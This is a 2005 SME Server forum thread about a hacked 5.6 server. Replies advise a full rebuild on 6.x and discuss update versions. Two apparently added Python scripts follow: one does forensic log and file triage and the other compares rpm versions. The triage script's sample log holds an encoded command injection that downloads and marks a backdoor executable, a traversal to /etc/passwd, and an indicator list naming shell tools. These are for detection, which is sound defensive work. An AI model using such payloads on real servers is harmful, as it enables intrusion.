Koozali.org: home of the SME Server

SME 5.6 hacked

forumuser7

SME 5.6 hacked
« on: May 29, 2005, 08:40:40 AM »
Hi,
My SME 5.6 server happily running for 2 years was recently hacked.
The index page of my web site was replaced by another and root password was changed.
I found the following hacking tools left on the server - “massplo” and “brute”
Probably my server was used also to launch attacks against other servers…

There were the following services running on the server at that moment:
-web server - It was hosting only one postNuke based web site and php forum.
-mail server
-ftp server (anon. access disabled)
-ssh (remote access enabled)
Telnet was disabled.

Is it possible to find out the way the hacker broke in?
Where I should look for evidences?
Are there any known vulnerabilities in SME 5.6?

Thank you for your help in advance!

raem
Re: SME 5.6 hacked
« Reply #1 on: May 29, 2005, 09:37:17 AM »
forumuser7

> ...php forum.

Unless you have upgraded to the latest version you probably got hacked that way. There were major security issues with phpBB, is that what you were using?

php itself also has security problems and the version on sme 5.6 would most likely be a problem also.

> Is it possible to find out the way the hacker broke in?
> Where I should look for evidences?

In the log files, if they are still there as they were probably deleted by the hacker.

Search google for similarities to your case.


> Are there any known vulnerabilities in SME 5.6?

Yes, you should not be using that as a gateway server!
It could well be that vulnerabilities in sme 5.6 allowed the hackers to break into your box!

I WOULD NOT continue using that 5.6 server.

Do a completely new rebuild of a 6.0 or 6.0.1 or 6.5 server. Do not restore from your backups as they are likely to contain hacker code which will be very difficult to totally eliminate. The hackers were probably in your machine well before they did the final damage, so recent backups may be unreliable.
A complete rebuild of your server (with minimal data restore - carefully screened) is the only way to be safe. Don't restore your configuration from the 5.6 server as you may compromise the security of your new box.

See
http://forums.contribs.org/index.php?topic=27534.0
for phpBB and php upgrade info

See
http://forums.contribs.org/index.php?topic=25064.msg102655#msg102655
for hacking info re phpBB

also the forums at www.phpBB.com from around November & December 2004 for more info re the phpBB problems
...
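Ray's advice above comes down to two things a responder can actually do on the box: read whatever survives of the web logs, and look at what changed on the filesystem. The following is an added example (not code from the thread or from SME Server) showing both checks in Python. It assumes the web server kept a Common/Combined Log Format access log that the attacker did not wipe, and that the foothold was a web request carrying shell commands, the usual shape of a PHP-forum exploit of that era. The log lines and the scratch files it creates are constructed, not taken from the compromised server.

```python
import os
import re
import stat
import tempfile
import time
from urllib.parse import unquote

# Substrings that rarely occur in legitimate forum traffic but do in
# command-injection and file-inclusion attempts. Matched after URL-decoding.
INDICATORS = ("wget ", "curl ", "chmod ", "/bin/sh", "perl -e", "uname -a",
              "system(", "passthru(", "shell_exec(", "/tmp/", "../", "\x00")

# Common Log Format prefix: client, identity, user, [timestamp], "request", status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def suspicious_requests(lines):
    """Return (client_ip, raw_path, matched_indicators) per suspect request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        # Decode twice: double-encoded payloads slip past single-pass filters.
        decoded = unquote(unquote(m.group("path"))).lower()
        matched = [ind for ind in INDICATORS if ind in decoded]
        if matched:
            hits.append((m.group("ip"), m.group("path"), matched))
    return hits


def filesystem_findings(root, since):
    """Walk ROOT and report files touched since SINCE (epoch seconds), files
    carrying the set-uid bit, and files that look timestomped.

    mtime can be reset from userland (touch -t), but ctime is written by the
    kernel on every inode change and cannot be set directly, so a file whose
    ctime is recent while its mtime is old deserves a look. Installers that
    preserve timestamps (cp -p, rpm) produce the same pattern, so treat it as
    a lead rather than proof.
    """
    recent, setuid, timestomped = [], [], []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if st.st_mtime >= since or st.st_ctime >= since:
                recent.append(path)
            if st.st_mode & stat.S_ISUID:
                setuid.append(path)
            if st.st_ctime - st.st_mtime > 86400:
                timestomped.append(path)
    return {"recent": recent, "setuid": setuid, "timestomped": timestomped}


# Constructed access-log lines (not from the compromised server). The third
# carries a single-encoded command chain, the fourth a double-encoded
# directory traversal; the first two are ordinary forum browsing.
SAMPLE_LOG = [
    '203.0.113.7 - - [28/May/2005:03:14:02 +0000] "GET /forum/index.php HTTP/1.1" 200 4521',
    '203.0.113.7 - - [28/May/2005:03:14:09 +0000] "GET /forum/viewtopic.php?t=12 HTTP/1.1" 200 9911',
    '198.51.100.23 - - [28/May/2005:03:20:41 +0000] "GET /forum/viewtopic.php?t=1&x=%3Bwget%20http%3A%2F%2F198.51.100.23%2Fbd%3Bchmod%20%2Bx%20bd HTTP/1.0" 200 812',
    '198.51.100.23 - - [28/May/2005:03:21:05 +0000] "GET /forum/index.php?page=..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.0" 200 1207',
]


def demo_triage():
    """Build a scratch tree with a freshly written page, a backdated dropped
    tool and a set-uid binary, run filesystem_findings over it, and return the
    basenames found under each heading."""
    now = time.time()
    with tempfile.TemporaryDirectory() as root:
        fresh = os.path.join(root, "index.html")  # defaced page, just written
        old = os.path.join(root, "brute")         # dropped tool, mtime faked back
        suid = os.path.join(root, "sh")           # set-uid shell left behind
        for path in (fresh, old, suid):
            with open(path, "w") as fh:
                fh.write("x\n")
        three_years = 3 * 365 * 86400
        os.utime(old, (now - three_years, now - three_years))  # like touch -t
        os.chmod(suid, 0o4755)
        found = filesystem_findings(root, now - 60)
        return {k: sorted(os.path.basename(p) for p in v) for k, v in found.items()}


if __name__ == "__main__":
    for ip, path, why in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} {path} <- {', '.join(why)}")
    print(demo_triage())
```

On a real box the log scan is run over the surviving httpd access logs and the filesystem walk over the web root, /tmp, /var/tmp and the home directories, with `since` set to the last time the site was known good. Run the checks from a trusted boot medium where possible: a rootkit on a host where root's password was changed can hide files from the installed `find` and `ls`.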

guest22

SME 5.6 hacked
« Reply #2 on: May 29, 2005, 07:46:37 PM »
Please note that ALL security related issues should be mailed to security AT contribs.org, public posting in these matters is a bad idea.

forumuser7

SME 5.6 hacked
« Reply #3 on: May 29, 2005, 08:49:57 PM »
RequestedDeletion, thank you for the reminder!
You are right!
I won't discuss details here and I'll post my question to the mail list you suggested.

Ray, thank you for the hints!
I won't use SME 5.6 anymore - I will try SME 6.0 or 6.0.1 or 6.5RC1 instead.
Which version would you recommend?
Which one is the most stable and secure?
Any thoughts why should I choose one over another?

Thank you very much for your time!

raem
SME 5.6 hacked
« Reply #4 on: May 31, 2005, 06:36:49 AM »
Everything I said above was public knowledge.

> I will try SME 6.0 or 6.0.1 or 6.5RC1 instead.
> Which version you would recomend?
> Which one is the most stable and secure?
>Any thoughts why should I choose one over another?

6.0 & 6.0.1 are essentially the same, except 6.0.1 has contribs.org branding. Both are stable & secure final releases.
6.5RC1 is a release candidate for 6.5 final; it has additional features that were add-ons to 6.x (mainly email related), some upgraded packages, and an upgraded kernel. From what I read and my own "play" with it, it appears stable in its current form although not a final release.

To be sure use 6.x, to be a little bit experimental use 6.5RC1.
If you use 6.0 from Mitel, be sure to apply the Mitel released updates.
...

forumuser7

SME 5.6 hacked
« Reply #5 on: May 31, 2005, 07:08:18 PM »
Ray,

If I stick with SME 6.0.1 where do I find the latest updates for 6.0.1?
I checked out the "updates" directory under "downloads" section but the only updates I found were:
initscripts-6.67-1es26.src.rpm
and
yum-1.0.3-6.1sme.src.rpm
Are these the only updates available for SME 6.0.1, or
is there another place that I should look?

What should I do if I need to upgrade PHP, MySQL or other packages with their latest versions?

Thank you for your help!

raem
SME 5.6 hacked
« Reply #6 on: June 01, 2005, 12:31:41 AM »
forumuser7

> Are these the only updates available for SME 6.0.1

Officially yes as far as I know.
There is a smeplus update script but this is not really for updating security fixes as such; it is more for upgrading applications and installing other contribs that some people deem useful.
There have been quite a few warnings posted that users should be wary of using the smeplus scripts, as you are likely to make upgrading to later sme versions very difficult or impossible, as such upgrade paths are not supported (i.e. due to wrong packages installed, incompatibilities, dependency problems etc.)

Personally I would not run the smeplus script as it makes too many unnecessary changes to my system.

> What should I do if I need to upgrade PHP, MySQL or other packages with the their latest versions?

There are scripts & howto available for upgrading those rpms only, search contribs.org and the contribs directory structure.
...

forumuser7

SME 5.6 hacked
« Reply #7 on: June 08, 2005, 06:55:08 AM »
Ray,
If I install SME 6.0.1, do I need to apply the updates from Mitel for v6.0, or are they already included in SME v6.0.1 (as a later release)?
Thank you for the help in advance!

raem
SME 5.6 hacked
« Reply #8 on: June 08, 2005, 07:41:27 AM »
forumuser7

> If I install SME 6.0.1, do I need to apply the
> updates from Mitel for v6.0, or are they already
> included in SME v6.0.1 (as a later release)?


They are for 6.0 not for 6.0.1.

I have not checked to see if the updates for 6.0 are in 6.0.1. (I'm using 6.0)
Note that the 6.0 updates were released on 20 May 2004.
The smeserver contribs.org 6.0.1 iso has a final release date of 17 March 2004.
The initscripts-6.67-1es26.i386.rpm update for 6.0.1 has a release date of 19 March 2004.

To me that says the Mitel 6.0 updates are newer than the final release of 6.0.1.

Can anybody else answer this?
...

raem
SME 5.6 hacked
« Reply #9 on: June 08, 2005, 11:03:33 AM »
You can compare the 6.0 updates packages here:
ftp://ftp.ibiblio.org/pub/linux/distributions/e-smith/updates/6.0/RPMS/

with the 6.0.1 final packages here:
ftp://ftp.ibiblio.org/pub/linux/distributions/smeserver/releases/6.0.1/os/e-smith/RPMS/

To my looking there is very little difference, with a few more of the Mitel updates being more recent, but some of the packages in 6.0.1 are more recent also, probably because 6.0 was reworked to create 6.0.1.

I think the differences are really functional rather than security related. You can update either 6.0 or 6.0.1 with later packages if you need or want to anyway.

I have always understood it that either 6.0 + 6.0 updates or 6.0.1 + 6.0.1 updates is safe to use.
One is branded Mitel, the other contribs.org.
...
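Ray's method of eyeballing the two ibiblio directories can be done mechanically. The following is an added example, not code from the thread, from SME Server or from rpm itself: it parses name-version-release.arch.rpm filenames and compares versions the way rpm does (segment by segment, numeric segments as numbers, alphabetic segments as strings, numeric beating alphabetic; the tilde and caret rules of later rpm releases are left out). Epoch is not recoverable from a filename, so for a definitive answer query the packages with `rpm -qp --qf`. Apart from the two filenames quoted earlier in the thread, the listings are constructed.

```python
import re

_SEGMENT = re.compile(r"[0-9]+|[A-Za-z]+")


def rpmvercmp(a, b):
    """Return -1, 0 or 1 like rpm's rpmvercmp (without ~ and ^ handling)."""
    if a == b:
        return 0
    seg_a, seg_b = _SEGMENT.findall(a), _SEGMENT.findall(b)
    for x, y in zip(seg_a, seg_b):
        x_num, y_num = x.isdigit(), y.isdigit()
        if x_num and y_num:
            if int(x) != int(y):                    # leading zeros ignored
                return 1 if int(x) > int(y) else -1
        elif x_num != y_num:
            return 1 if x_num else -1               # numeric beats alphabetic
        elif x != y:
            return 1 if x > y else -1               # plain strcmp on letters
    if len(seg_a) == len(seg_b):
        return 0
    return 1 if len(seg_a) > len(seg_b) else -1     # extra trailing segment wins


def parse_rpm_filename(filename):
    """Split name-version-release.arch.rpm into its fields (epoch is not in
    the filename; rpm -qp --qf '%{EPOCH}' reports it)."""
    if not filename.endswith(".rpm"):
        raise ValueError("not an rpm filename: " + filename)
    nvr, arch = filename[:-4].rsplit(".", 1)
    name, version, release = nvr.rsplit("-", 2)
    return {"name": name, "version": version, "release": release, "arch": arch}


def compare_vr(a, b):
    """Compare (version, release) pairs; version decides unless equal."""
    rc = rpmvercmp(a[0], b[0])
    return rc if rc else rpmvercmp(a[1], b[1])


def compare_package_sets(left, right):
    """Say which side ships the newer build of each package name.

    Returns {name: "left" | "right" | "same"} plus "left_only" and
    "right_only" lists for names present on one side only."""
    def newest_by_name(filenames):
        newest = {}
        for f in filenames:
            p = parse_rpm_filename(f)
            vr = (p["version"], p["release"])
            if p["name"] not in newest or compare_vr(vr, newest[p["name"]]) > 0:
                newest[p["name"]] = vr
        return newest

    li, ri = newest_by_name(left), newest_by_name(right)
    result = {"left_only": sorted(set(li) - set(ri)),
              "right_only": sorted(set(ri) - set(li))}
    for name in sorted(set(li) & set(ri)):
        rc = compare_vr(li[name], ri[name])
        result[name] = "left" if rc > 0 else ("right" if rc < 0 else "same")
    return result


# Constructed listings standing in for the two ibiblio directories. Only the
# initscripts and yum filenames come from the thread; pkga, pkgb and leftonly
# are made up to exercise the comparison rules.
UPDATES_6_0 = [
    "initscripts-6.67-1es26.i386.rpm",
    "pkga-1.10-1.i386.rpm",
    "pkgb-2.0-3.i386.rpm",
    "leftonly-1.0-1.i386.rpm",
]
RELEASE_6_0_1 = [
    "initscripts-6.67-1es26.i386.rpm",
    "pkga-1.9-2.i386.rpm",      # 1.9 < 1.10: segments compare as numbers
    "pkgb-2.0-3a.i386.rpm",     # release 3a > 3: extra trailing segment wins
    "yum-1.0.3-6.1sme.src.rpm",
]


if __name__ == "__main__":
    verdicts = compare_package_sets(UPDATES_6_0, RELEASE_6_0_1)
    for name, verdict in sorted(verdicts.items()):
        print(f"{name:12} {verdict}")
```

Feed it the two directory listings (`ls` of each mirror directory) and the "left"/"right" verdicts show which side carries the newer build of each package; "same" names are the ones that need no attention. The one thing a filename comparison cannot settle is an epoch bump, which is why an rpm query on the files themselves is the final word.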

forumuser7

SME 5.6 hacked
« Reply #10 on: June 08, 2005, 04:08:48 PM »
Quote from: RayMitchell
> To me that says the Mitel 6.0 updates are newer than the final release of 6.0.1.
> Can anybody else answer this?


It is a bit confusing...
It seems that v6.0.1 doesn't include the updates for v6.0...
Maybe it is safer to stick with v.6.0 + updates?
Any comments?

ngomes
Contribs.org needs you
« Reply #11 on: August 29, 2005, 01:27:35 PM »
The SME Server development (aka, the new releases) and maintenance (aka, the updates) depends entirely on the Contribs.org community.

Just to keep all of you up to date, Ian Wells, Floyd Hartog, Dave Kainer and Matthew Copple (sorry if I left someone out) are the people trying to give this community the SME Server 6.x maintenance and bugfix updates and bring to life the SME Server 6.5 final stable release.

Contribs.org needs your help on this project.
What can you do for Contribs.org?

# Read the maintenance process:
http://no.longer.valid/phpwiki/index.php/Maintenance%20Process

# Join the devinfo mailing list and offer your help to test, debug, etc:
http://lists.contribs.org/mailman/listinfo/devinfo

# Go to the Contribs.org Bug Tracker and study some of the listed bugs with new or feedback status, simulate them, give your feedback, try to find some sort of solution. Also if you have some packager skills try to build some rpm packages to the listed bugs with resolved or closed status:
http://no.longer.valid/mantis/view_all_bug_page.php

Finally, take these thoughts into serious consideration (taken from Charlie Brady, an SME core developer):

> If maintenance of distribution updates is not a "core role" for contribs.org, then what is?

> Don't ask what contribs.org can do for me, ask what I can do for contribs.org.


-Nuno
Nuno Rafael Gomes
Learning everyday from everyday problems...